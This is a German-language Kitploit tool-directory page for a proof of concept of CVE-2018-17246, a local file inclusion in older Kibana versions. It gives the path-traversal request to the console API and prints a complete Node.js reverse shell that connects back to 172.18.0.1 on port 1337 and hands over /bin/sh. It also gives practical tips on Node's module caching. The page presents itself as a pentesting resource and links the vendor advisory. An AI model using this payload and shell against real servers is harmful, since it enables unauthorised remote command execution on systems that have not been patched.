Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2018-17246 — CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13 | Kitploit
Tools/GitHubGitHub/mpgn/cve-2018-17246
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsRed TeamingPayload-Entwicklung
GitHubmpgn/cve-2018-17246

CVE-2018-17246

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13

Repository anzeigen
6515vor 6 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2018-17246 - Kibana LFI < 6.4.3 & 5.6.13

Eine Local File Inclusion (LFI) auf Kibana, entdeckt von CyberArk Labs, kann genutzt werden, um eine Reverse Shell auf dem Kibana-Server auszuführen, mit dem folgenden Payload:

root@kitploit:~
/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../path/to/shell.js

Wie du bereits vermutet hast, muss dieser Angriff mit einem uneingeschränkten Datei-Upload oder einer anderen Schwachstelle kombiniert werden, die es dir ermöglicht, eine Datei auf dem Server zu schreiben.

Es gibt keine Eingabevalidierung, daher können wir den Namen der JavaScript-Datei in alles ändern, was wir wollen. In diesem Fall können wir mit der Path-Traversal-Technik jede Datei auf dem Kibana-Server auswählen. Eine Sache, die jedoch zu beachten ist, ist die Modul-Caching-Funktion von Node. Im Wesentlichen, da die LFI funktioniert, indem unvalidierte Benutzereingaben an die require-Funktion von Node gesendet werden, wird das eingebundene Modul (die Nutzlast des Angreifers) anhand des Dateinamens zwischengespeichert. Das bedeutet, dass du nicht dasselbe Payload senden kannst, um z.B. eine Reverse Shell zu erhalten.

lfi

Details zur Schwachstelle: https://www.cyberark.com/threat-research-blog/execute-this-i-know-you-have-it/ Sicherheitshinweis: https://www.elastic.co/blog/kibana-local-file-inclusion-flaw-cve-2018-17246


  • Kibana-Version 6.0.0 aus Docker (ohne verknüpftes ElasticSearch ist der PoC funktionsfähig)
  • shell.js von https://github.com/appsecco/vulnerable-apps/tree/master/node-reverse-shell
root@kitploit:~
(function(){
    var net = require("net"),
        cp = require("child_process"),
        sh = cp.spawn("/bin/sh", []);
    var client = new net.Socket();
    client.connect(1337, "172.18.0.1", function(){
        client.pipe(sh.stdin);
        sh.stdout.pipe(client);
        sh.stderr.pipe(client);
    });
    return /a/; // Prevents the Node.js application form crashing
})();
Tool herunterladen